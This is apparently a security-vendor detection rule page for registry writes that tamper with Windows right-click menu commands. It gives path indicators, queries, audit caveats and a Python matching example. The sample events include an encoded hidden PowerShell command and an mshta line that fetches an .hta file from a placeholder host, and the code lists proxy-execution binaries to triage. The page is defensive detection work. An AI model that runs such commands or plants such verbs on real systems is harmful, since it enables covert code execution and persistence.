Shell Context Menu Command Tampering

    Date: 01/08/2025

    Severity: Low

    Summary

    Identifies modifications to shell context menu command keys, that is, writes under \Software\Classes\<type>\shell\<verb>\command. The (Default) value of such a key is the command line Explorer runs when a user picks that verb (for example "Open") from the right-click menu of a file, folder or drive, so replacing it lets an attacker execute an arbitrary command through routine user interaction and keep persistence without a conventional autorun entry. This rule surfaces such writes for review; it does not by itself distinguish a tampered verb from one registered by a legitimate installer.

    Indicators of Compromise (IOC) List

    TargetObject contains all of the following (every fragment must appear in the same registry path):

    - '\Software\Classes\'

    - '\shell\'

    - '\command\'

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Detection Query :

    resourcename = "Windows Security" and eventtype = "4657" and (objectname like "\Software\Classes" and objectname like "\shell" and objectname like "\command")

    Detection Query :

    technologygroup = "EDR" and (objectname like "\Software\Classes" and objectname like "\shell" and objectname like "\command")

    Notes:

    - Windows Security event 4657 ("A registry value was modified") is only generated when Object Access auditing for the registry is enabled and a SACL covering these keys is in place; without that, only the EDR query will fire.

    - 4657 records the key in Object Name and the value being written in a separate Object Value Name field, so the key path alone ends in \command. If the source rule's '\command\' fragment (written for Sysmon TargetObject, which appends the value name) is reused verbatim against 4657, it will miss these writes; match on the key path or combine the two fields.

    - HKEY_CLASSES_ROOT is a merged view of HKLM\Software\Classes and HKCU\Software\Classes, which is why the rule keys on \Software\Classes\ rather than on HKCR.

    - This is a threat-hunting rule with Low severity: installers for archivers, editors and other shell-integrated applications legitimately write ...\shell\<verb>\command keys. Baseline on the writing process and on the command value; a verb whose command launches a script host or proxy-execution binary is the first thing to triage.
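    As an added example (not code from this page, from Gurucul, or from the SigmaHQ rule), the following Python applies the rule's contains-all logic to a few constructed registry events from both sources. The event shape, field names, SIDs, paths and command values are assumptions made for the illustration; the triage list of script hosts and proxy binaries is an addition for ranking hits and is not part of the rule. It also shows the 4657 field-layout caveat above: the key path alone does not contain '\command\', the key joined with its value name does.

```python
from dataclasses import dataclass

# The three path fragments from the rule; all of them must appear in the
# target object (Sigma "contains|all"). Plain strings rather than raw
# strings because a raw string literal cannot end in a backslash.
REQUIRED_FRAGMENTS = ("\\software\\classes\\", "\\shell\\", "\\command\\")

# Event IDs the two queries above cover: Windows Security 4657 ("A registry
# value was modified") and Sysmon 13 (RegistryEvent, Value Set).
REGISTRY_WRITE_EVENT_IDS = {4657, 13}

# Script hosts and proxy-execution binaries, used only to rank matches for
# triage. This list is an addition in this example, not part of the rule.
TRIAGE_BINARIES = ("powershell", "pwsh", "cmd.exe", "wscript", "cscript",
                   "mshta", "rundll32", "regsvr32", "certutil")


@dataclass
class RegistryEvent:
    """Assumed minimal shape of a normalised registry-write event."""
    event_id: int
    object_name: str        # key path as the source logs it (case varies)
    process_name: str       # image that performed the write
    new_value: str          # data written to the value
    value_name: str = ""    # 4657 "Object Value Name"; empty when the path already carries it


def target_object(event: RegistryEvent) -> str:
    """Build a Sysmon-style "key\\valuename" string so one check serves both
    sources. Security event 4657 logs the key in Object Name and the value
    separately in Object Value Name, so the key alone ends in "\\command" and
    never contains the "\\command\\" fragment; Sysmon 13's TargetObject
    already includes the value name."""
    if event.value_name:
        return f"{event.object_name}\\{event.value_name}"
    return event.object_name


def is_context_menu_command_write(target: str) -> bool:
    """True when every required fragment occurs in the target. The registry
    is case-insensitive, so compare in lowercase."""
    path = target.lower()
    return all(fragment in path for fragment in REQUIRED_FRAGMENTS)


def looks_suspicious(event: RegistryEvent) -> bool:
    """Triage heuristic: a verb whose command launches an interpreter or a
    proxy-execution binary is worth a look before an installer's editor.exe."""
    value = event.new_value.lower()
    return any(binary in value for binary in TRIAGE_BINARIES)


def detect(events):
    """Apply the rule; return (event, suspicious) pairs for every match."""
    hits = []
    for event in events:
        if event.event_id not in REGISTRY_WRITE_EVENT_IDS:
            continue
        if is_context_menu_command_write(target_object(event)):
            hits.append((event, looks_suspicious(event)))
    return hits


# Constructed sample events, not real telemetry. The SIDs, GUID, paths and
# values are made up; "(Default)" as the value name follows Sysmon's
# convention and is assumed for the 4657 sample as well.
SAMPLE_EVENTS = [
    RegistryEvent(4657,
                  "\\REGISTRY\\USER\\S-1-5-21-1111-2222-3333-1001\\Software\\Classes\\*\\shell\\Updater\\command",
                  "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                  "powershell.exe -w hidden -enc SQBFAFgA",
                  value_name="(Default)"),
    RegistryEvent(13,
                  "HKLM\\SOFTWARE\\Classes\\Directory\\Background\\shell\\cmd\\command\\(Default)",
                  "C:\\Windows\\System32\\rundll32.exe",
                  "mshta.exe http://example.invalid/x.hta"),
    RegistryEvent(13,
                  "HKU\\S-1-5-21-1111-2222-3333-1001\\Software\\Classes\\txtfile\\shell\\open\\command\\(Default)",
                  "C:\\Program Files\\Editor\\setup.exe",
                  "\"C:\\Program Files\\Editor\\editor.exe\" \"%1\""),
    RegistryEvent(4657,
                  "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
                  "C:\\Windows\\explorer.exe",
                  "C:\\Users\\Public\\a.exe",
                  value_name="Updater"),
    RegistryEvent(13,
                  "HKLM\\SOFTWARE\\Classes\\CLSID\\{11111111-2222-3333-4444-555555555555}\\InprocServer32\\(Default)",
                  "C:\\Windows\\System32\\msiexec.exe",
                  "C:\\Windows\\System32\\shell32.dll"),
]


if __name__ == "__main__":
    for event, suspicious in detect(SAMPLE_EVENTS):
        flag = "TRIAGE FIRST" if suspicious else "likely benign install"
        print(f"EID {event.event_id} {event.process_name} -> {target_object(event)} [{flag}]")
```

    Run as a script it prints the three matching writes (the powershell and mshta verbs flagged for triage, the editor install not), and ignores the Run key and the CLSID server registration, which contain only some of the fragments. The normalisation in target_object is the part to carry into a real pipeline: feeding the raw 4657 Object Name into a '\command\' substring match silently drops every hit from that source.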

    Reference:

    https://github.com/SigmaHQ/sigma/blob/master/rules-threat-hunting/windows/registry/registry_set/registry_set_shell_context_menu_tampering.yml


    Tags

    Malware, Sigma
